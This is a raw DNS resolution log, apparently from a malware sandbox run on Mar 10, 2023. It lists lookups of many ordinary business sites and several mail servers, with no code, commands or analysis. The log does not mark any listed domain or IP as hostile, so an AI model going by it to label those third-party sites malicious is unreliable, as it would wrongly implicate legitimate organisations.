                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:43.446059942 CET8.8.8.8192.168.2.60xede7No error (0)cpmteam.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:46.496342897 CET8.8.8.8192.168.2.60xcb0bNo error (0)nels.co.uk5.134.13.210A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:46.639976978 CET8.8.8.8192.168.2.60xa0e0No error (0)mackusick.de217.160.0.131A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:46.643057108 CET8.8.8.8192.168.2.60xebabNo error (0)smtp.sbcglobal.yahoo.comsmtp-sbc.mail.yahoo.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:46.643057108 CET8.8.8.8192.168.2.60xebabNo error (0)smtp-sbc.mail.yahoo.comsmtp1.sbc.mail.am0.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:46.643057108 CET8.8.8.8192.168.2.60xebabNo error (0)smtp1.sbc.mail.am0.yahoodns.net66.163.170.48A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:46.643057108 CET8.8.8.8192.168.2.60xebabNo error (0)smtp1.sbc.mail.am0.yahoodns.net66.218.88.163A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:46.643057108 CET8.8.8.8192.168.2.60xebabNo error (0)smtp1.sbc.mail.am0.yahoodns.net67.195.12.38A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:46.736363888 CET8.8.8.8192.168.2.60x3402No error (0)jabian.com104.26.6.17A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:46.736363888 CET8.8.8.8192.168.2.60x3402No error (0)jabian.com104.26.7.17A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:46.736363888 CET8.8.8.8192.168.2.60x3402No error (0)jabian.com172.67.71.13A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:46.819108963 CET8.8.8.8192.168.2.60x7f98No error (0)kavram.com172.67.189.68A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:46.819108963 CET8.8.8.8192.168.2.60x7f98No error (0)kavram.com104.21.89.126A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:46.828206062 CET8.8.8.8192.168.2.60x57d5No error (0)cyclad.pl87.98.236.253A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:46.869970083 CET8.8.8.8192.168.2.60x2682No error (0)ntc.edu.au192.124.249.15A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:46.916019917 CET8.8.8.8192.168.2.60xb59eNo error (0)hamaker.net34.102.136.180A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:46.922003031 CET8.8.8.8192.168.2.60xad3No error (0)shesfit.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:46.922003031 CET8.8.8.8192.168.2.60xad3No error (0)shesfit.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:46.970397949 CET8.8.8.8192.168.2.60xe77aNo error (0)mikihan.com153.126.211.112A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:47.011146069 CET8.8.8.8192.168.2.60x9d5bNo error (0)oaith.ca192.124.249.12A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:47.025055885 CET8.8.8.8192.168.2.60xf51aNo error (0)shittas.com43.246.117.171A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:47.046571970 CET8.8.8.8192.168.2.60x1fd2No error (0)nolaoig.org54.212.145.129A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:47.075043917 CET8.8.8.8192.168.2.60x3e6cNo error (0)gbmfg.com151.101.2.132A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:47.075043917 CET8.8.8.8192.168.2.60x3e6cNo error (0)gbmfg.com151.101.66.132A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:47.075043917 CET8.8.8.8192.168.2.60x3e6cNo error (0)gbmfg.com151.101.130.132A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:47.075043917 CET8.8.8.8192.168.2.60x3e6cNo error (0)gbmfg.com151.101.194.132A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:47.085421085 CET8.8.8.8192.168.2.60xa6ecNo error (0)refintl.org198.49.23.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:47.085421085 CET8.8.8.8192.168.2.60xa6ecNo error (0)refintl.org198.49.23.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:47.085421085 CET8.8.8.8192.168.2.60xa6ecNo error (0)refintl.org198.185.159.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:47.085421085 CET8.8.8.8192.168.2.60xa6ecNo error (0)refintl.org198.185.159.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:47.108649969 CET8.8.8.8192.168.2.60xe64bNo error (0)rokoron.com211.13.204.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:47.145175934 CET8.8.8.8192.168.2.60xec33No error (0)holp-ai.com59.106.13.169A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:47.192430019 CET8.8.8.8192.168.2.60x1df7No error (0)www.sclover3.com157.112.182.239A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:47.593283892 CET8.8.8.8192.168.2.60x6355No error (0)icd-host.com192.252.159.165A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:47.593283892 CET8.8.8.8192.168.2.60x6355No error (0)icd-host.com192.252.159.116A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:47.602257967 CET8.8.8.8192.168.2.60x60b4No error (0)isom.org192.124.249.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:47.749629021 CET8.8.8.8192.168.2.60xe2caNo error (0)vdoherty.com91.216.241.100A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:47.818594933 CET8.8.8.8192.168.2.60x529cNo error (0)orlyhotel.com172.67.156.49A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:47.818594933 CET8.8.8.8192.168.2.60x529cNo error (0)orlyhotel.com104.21.48.207A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:48.059536934 CET8.8.8.8192.168.2.60x880bNo error (0)wnit.org38.111.255.201A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:48.351121902 CET8.8.8.8192.168.2.60x7e9aNo error (0)burstner.ru52.50.65.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:48.359914064 CET8.8.8.8192.168.2.60xa2ccName error (3)haigh-me.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:48.591905117 CET8.8.8.8192.168.2.60x87e8No error (0)roewer.de45.142.176.225A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:48.594847918 CET8.8.8.8192.168.2.60xe6e2No error (0)siongann.com172.67.156.237A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:48.594847918 CET8.8.8.8192.168.2.60xe6e2No error (0)siongann.com104.21.8.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:48.636661053 CET8.8.8.8192.168.2.60x275dNo error (0)agulatex.com133.125.38.187A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:48.679815054 CET8.8.8.8192.168.2.60xf9abNo error (0)bd-style.com107.165.223.27A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:48.689872026 CET8.8.8.8192.168.2.60x6604No error (0)forbin.net172.67.148.35A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:48.689872026 CET8.8.8.8192.168.2.60x6604No error (0)forbin.net104.21.41.152A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:48.698426962 CET8.8.8.8192.168.2.60x37f5No error (0)camamat.com104.21.235.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:48.698426962 CET8.8.8.8192.168.2.60x37f5No error (0)camamat.com104.21.235.31A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:48.699724913 CET8.8.8.8192.168.2.60x5256No error (0)mxs.mail.ru217.69.139.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:48.699724913 CET8.8.8.8192.168.2.60x5256No error (0)mxs.mail.ru94.100.180.31A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:48.699760914 CET8.8.8.8192.168.2.60x50f6No error (0)msl-lock.com165.160.15.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:48.699760914 CET8.8.8.8192.168.2.60x50f6No error (0)msl-lock.com165.160.13.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:49.091877937 CET8.8.8.8192.168.2.60x35e1No error (0)alt4.gmail-smtp-in.l.google.com142.250.157.27A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:49.153152943 CET8.8.8.8192.168.2.60x880bNo error (0)wnit.org38.111.255.201A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:49.298610926 CET8.8.8.8192.168.2.60x4a45No error (0)gmail-smtp-in.l.google.com142.250.27.27A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:49.325337887 CET8.8.8.8192.168.2.60x5b26No error (0)bggs.com35.230.155.43A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:49.325421095 CET8.8.8.8192.168.2.60xc1b2No error (0)ossir.org51.159.3.117A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:49.370398045 CET8.8.8.8192.168.2.60x16e9No error (0)mondopp.net173.231.184.124A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:49.450786114 CET8.8.8.8192.168.2.60xa2b2No error (0)in1.smtp.messaginguser.com66.111.4.71A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:49.450786114 CET8.8.8.8192.168.2.60xa2b2No error (0)in1.smtp.messaginguser.com66.111.4.70A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:49.450786114 CET8.8.8.8192.168.2.60xa2b2No error (0)in1.smtp.messaginguser.com66.111.4.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:49.450786114 CET8.8.8.8192.168.2.60xa2b2No error (0)in1.smtp.messaginguser.com66.111.4.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:49.450786114 CET8.8.8.8192.168.2.60xa2b2No error (0)in1.smtp.messaginguser.com66.111.4.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:49.450786114 CET8.8.8.8192.168.2.60xa2b2No error (0)in1.smtp.messaginguser.com66.111.4.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:49.459801912 CET8.8.8.8192.168.2.60xf65fName error (3)haigh-me.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:49.555046082 CET8.8.8.8192.168.2.60xc9c1No error (0)wanoa.com159.89.244.183A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:49.555046082 CET8.8.8.8192.168.2.60xc9c1No error (0)wanoa.com164.90.244.158A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:49.591461897 CET8.8.8.8192.168.2.60x604No error (0)esmoke.net204.15.134.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:49.621845961 CET8.8.8.8192.168.2.60x26a5No error (0)gcss.com35.186.238.101A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:49.666100979 CET8.8.8.8192.168.2.60xb486No error (0)oh28ya.com54.250.32.94A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:49.666100979 CET8.8.8.8192.168.2.60xb486No error (0)oh28ya.com18.182.136.195A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:49.667659998 CET8.8.8.8192.168.2.60xe5c1No error (0)sigtoa.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:49.667659998 CET8.8.8.8192.168.2.60xe5c1No error (0)sigtoa.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:49.679929018 CET8.8.8.8192.168.2.60x32d9No error (0)geecl.com213.175.217.57A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:49.737358093 CET8.8.8.8192.168.2.60xc567No error (0)top1oil.com172.67.71.55A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:49.737358093 CET8.8.8.8192.168.2.60xc567No error (0)top1oil.com104.26.1.82A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:49.737358093 CET8.8.8.8192.168.2.60xc567No error (0)top1oil.com104.26.0.82A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:49.762074947 CET8.8.8.8192.168.2.60xb78cName error (3)haigh-me.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:49.792932987 CET8.8.8.8192.168.2.60x59ebName error (3)toundo.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:49.797235966 CET8.8.8.8192.168.2.60xc6baNo error (0)canasil.com172.67.68.180A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:49.797235966 CET8.8.8.8192.168.2.60xc6baNo error (0)canasil.com104.26.3.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:49.797235966 CET8.8.8.8192.168.2.60xc6baNo error (0)canasil.com104.26.2.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:49.935616016 CET8.8.8.8192.168.2.60xa565No error (0)gydrozo.ru91.220.211.163A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:49.945936918 CET8.8.8.8192.168.2.60x2b79Name error (3)toundo.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:49.974499941 CET8.8.8.8192.168.2.60x59d1No error (0)4locals.net80.82.115.227A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:50.033181906 CET8.8.8.8192.168.2.60xa1a8Name error (3)toundo.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:50.036708117 CET8.8.8.8192.168.2.60xc791No error (0)com-edit.fr63.251.106.25A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:50.064269066 CET8.8.8.8192.168.2.60xaf18Name error (3)mail7.digitalwaves.co.nznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:50.071615934 CET8.8.8.8192.168.2.60xcebaNo error (0)kavram.com104.21.89.126A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:50.071615934 CET8.8.8.8192.168.2.60xcebaNo error (0)kavram.com172.67.189.68A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:50.102227926 CET8.8.8.8192.168.2.60xa2a6No error (0)uhsa.edu.ag192.124.249.13A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:50.111295938 CET8.8.8.8192.168.2.60xb5eeNo error (0)aluminox.es37.59.243.164A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:50.127675056 CET8.8.8.8192.168.2.60xeeb1No error (0)host.do217.79.248.38A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:50.130220890 CET8.8.8.8192.168.2.60x9eb7Server failure (2)ftchat.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:50.145914078 CET8.8.8.8192.168.2.60xaf1bNo error (0)fundeo.com104.24.160.27A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:50.145914078 CET8.8.8.8192.168.2.60xaf1bNo error (0)fundeo.com172.67.97.62A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:50.145914078 CET8.8.8.8192.168.2.60xaf1bNo error (0)fundeo.com104.24.161.27A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:50.261951923 CET8.8.8.8192.168.2.60xf42aNo error (0)gbp-jp.com208.80.123.195A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:50.261951923 CET8.8.8.8192.168.2.60xf42aNo error (0)gbp-jp.com208.80.122.2A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:50.261951923 CET8.8.8.8192.168.2.60xf42aNo error (0)gbp-jp.com208.80.122.205A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:50.261951923 CET8.8.8.8192.168.2.60xf42aNo error (0)gbp-jp.com208.80.123.104A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:50.406143904 CET8.8.8.8192.168.2.60x25c5No error (0)shittas.com43.246.117.171A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:50.443208933 CET8.8.8.8192.168.2.60x5fd2No error (0)banvari.com23.227.38.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:50.481961966 CET8.8.8.8192.168.2.60x2a30No error (0)tozzhin.com202.94.166.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:50.517029047 CET8.8.8.8192.168.2.60xacbaNo error (0)www.synetik.netsynetik.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:50.517029047 CET8.8.8.8192.168.2.60xacbaNo error (0)synetik.net193.166.255.171A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:50.519421101 CET8.8.8.8192.168.2.60xa87bNo error (0)k-nikko.com18.177.67.59A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:50.648610115 CET8.8.8.8192.168.2.60xaa99No error (0)anduran.comtraff-2.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:50.648610115 CET8.8.8.8192.168.2.60xaa99No error (0)traff-2.hugedomains.comhdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:50.648610115 CET8.8.8.8192.168.2.60xaa99No error (0)hdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.com3.130.204.160A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:50.648610115 CET8.8.8.8192.168.2.60xaa99No error (0)hdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.com3.130.253.23A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:50.696599007 CET8.8.8.8192.168.2.60xdd8cNo error (0)zugseil.com92.42.191.38A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:50.710891962 CET8.8.8.8192.168.2.60x34a3No error (0)fogra.com.pl85.128.55.51A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:50.720033884 CET8.8.8.8192.168.2.60xa24cNo error (0)icd-host.com192.252.159.116A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:50.720033884 CET8.8.8.8192.168.2.60xa24cNo error (0)icd-host.com192.252.159.165A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:50.727447033 CET8.8.8.8192.168.2.60xe47bNo error (0)cubodown.com104.21.30.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:50.727447033 CET8.8.8.8192.168.2.60xe47bNo error (0)cubodown.com172.67.150.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:50.732091904 CET8.8.8.8192.168.2.60x9980No error (0)jabian.com104.26.6.17A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:50.732091904 CET8.8.8.8192.168.2.60x9980No error (0)jabian.com104.26.7.17A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:50.732091904 CET8.8.8.8192.168.2.60x9980No error (0)jabian.com172.67.71.13A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:51.008816957 CET8.8.8.8192.168.2.60x72a5No error (0)angework.com219.94.128.87A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:51.118812084 CET8.8.8.8192.168.2.60xb0abNo error (0)nrsi.com76.223.35.103A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:51.121985912 CET8.8.8.8192.168.2.60x6bebNo error (0)ruzee.com207.180.198.201A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:51.164467096 CET8.8.8.8192.168.2.60x425bNo error (0)hyab.se188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:51.164467096 CET8.8.8.8192.168.2.60x425bNo error (0)hyab.se188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:51.198190928 CET8.8.8.8192.168.2.60x289bNo error (0)diamir.de138.201.65.187A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:51.200310946 CET8.8.8.8192.168.2.60xdf21No error (0)kallman.net185.76.64.25A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:51.244561911 CET8.8.8.8192.168.2.60x1bd9No error (0)nolaoig.org54.212.145.129A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:51.262458086 CET8.8.8.8192.168.2.60x5d76No error (0)univi.it18.197.121.220A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:51.334117889 CET8.8.8.8192.168.2.60x703eNo error (0)biurohera.pl79.96.161.192A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:51.334117889 CET8.8.8.8192.168.2.60x703eNo error (0)biurohera.pl54.36.175.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:51.379652977 CET8.8.8.8192.168.2.60x50fNo error (0)aluminox.es37.59.243.164A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:51.400335073 CET8.8.8.8192.168.2.60x6485No error (0)akr.co.id172.67.33.252A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:51.400335073 CET8.8.8.8192.168.2.60x6485No error (0)akr.co.id104.20.123.68A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:51.400335073 CET8.8.8.8192.168.2.60x6485No error (0)akr.co.id104.20.122.68A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:51.468117952 CET8.8.8.8192.168.2.60xd171No error (0)dwid.de87.230.93.218A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:51.472249985 CET8.8.8.8192.168.2.60x518bNo error (0)kavram.com104.21.89.126A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:51.472249985 CET8.8.8.8192.168.2.60x518bNo error (0)kavram.com172.67.189.68A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:51.472825050 CET8.8.8.8192.168.2.60x4f7No error (0)doggybag.org213.186.33.16A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:51.473553896 CET8.8.8.8192.168.2.60xe17No error (0)yhsll.com154.88.50.199A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:51.537030935 CET8.8.8.8192.168.2.60x90e7No error (0)mackusick.de217.160.0.131A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:51.540965080 CET8.8.8.8192.168.2.60x511bNo error (0)s5w.com192.99.226.184A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:51.541970015 CET8.8.8.8192.168.2.60x9826No error (0)orlyhotel.com172.67.156.49A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:51.541970015 CET8.8.8.8192.168.2.60x9826No error (0)orlyhotel.com104.21.48.207A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:51.640006065 CET8.8.8.8192.168.2.60x88edNo error (0)ikulani.com157.7.107.88A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:51.702224970 CET8.8.8.8192.168.2.60xbbdcNo error (0)clinicasanluis.com.co104.21.66.220A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:51.702224970 CET8.8.8.8192.168.2.60xbbdcNo error (0)clinicasanluis.com.co172.67.164.178A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:51.788549900 CET8.8.8.8192.168.2.60x7e1cNo error (0)scintel.com23.239.201.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:51.788568974 CET8.8.8.8192.168.2.60x426fNo error (0)t-mould.com81.169.145.175A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:51.796269894 CET8.8.8.8192.168.2.60xe030No error (0)listel.co.jp49.212.243.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:51.912178040 CET8.8.8.8192.168.2.60x5c65No error (0)canasil.com172.67.68.180A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:51.912178040 CET8.8.8.8192.168.2.60x5c65No error (0)canasil.com104.26.2.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:51.912178040 CET8.8.8.8192.168.2.60x5c65No error (0)canasil.com104.26.3.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:52.005954981 CET8.8.8.8192.168.2.60x1468No error (0)absblast.com141.193.213.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:52.008905888 CET8.8.8.8192.168.2.60x5351No error (0)metaforacom.com185.42.105.162A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:52.030137062 CET8.8.8.8192.168.2.60x7b95No error (0)zupraha.cz77.78.104.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:52.167229891 CET8.8.8.8192.168.2.60x690No error (0)dbnet.at188.94.254.88A (IP address)IN (0x0001)false
